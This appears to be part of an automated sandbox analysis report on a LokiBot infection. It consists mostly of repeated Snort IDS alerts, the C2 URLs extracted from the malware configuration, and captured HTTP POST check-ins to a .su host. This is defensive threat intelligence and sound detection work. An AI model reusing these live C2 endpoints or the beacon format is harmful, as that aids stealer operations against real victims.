Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49719 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49719 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49719
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56122 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49720 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49720 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49720 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49720 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49720 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49720
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52556 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49721 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49721 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49721 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49721 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49721 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49721
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61609 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49722 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49722 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49722 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49722 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49722 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49722
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52481 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49723 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49723 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49723 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49723 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49723 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49723
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:53943 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49724 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49724 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49724 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49724 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49724 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49724
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56086 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49725 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49725 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49725 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49725 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49725 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49725
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56547 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49726 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49726 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49726 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49726 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49726 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49726
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59881 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49727 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49727 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49727 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49727 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49727 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49727
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:58917 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49728 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49728 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49728 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49728 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49728 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49728
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:50343 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49729 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49729 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49729 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49729 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49729 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49729
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62520 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49730 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49730 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49730 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49730 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49730 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49730
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:55629 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49731 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49731 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49731 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49731 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49731 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49731
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52079 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49732 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49732 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49732 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49732 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49732 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49732
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56569 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49733 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49733 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49733 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49733 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49733 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49733
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61833 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49734 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49734 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49734 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49734 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49734 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49734
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:65044 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49735 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49735 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49735 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49735 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49735 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49735
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:60032 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49736 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49736 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49736 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49736 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49736 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49736
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49232 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49737 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49737 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49737 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49737 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49737 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49737
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56123 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49738 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49738 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49738 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49738 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49738 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49738
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59752 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49739 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49739 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49739 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49739 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49739 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49739
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52865 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49740 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49740 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49740 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49740 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49740 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49740
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:57322 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49741 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49741 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49741 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49741 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49741 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49741
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62958 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49742 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49742 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49742 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49742 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49742 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49742
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:64404 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49743 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49743 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49743 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49743 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49743 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49743
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62848 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49744 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49744 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49744 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49744 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49744 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49744
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:55956 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49745 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49745 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49745 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49745 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49745 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49745

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://sempersim.su/gl21/fre.php

Source: Joe Sandbox View

ASN Name: VTSL1-ASRU VTSL1-ASRU

Source: Joe Sandbox View

IP Address: 91.142.77.45 91.142.77.45

Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 196Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 196Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
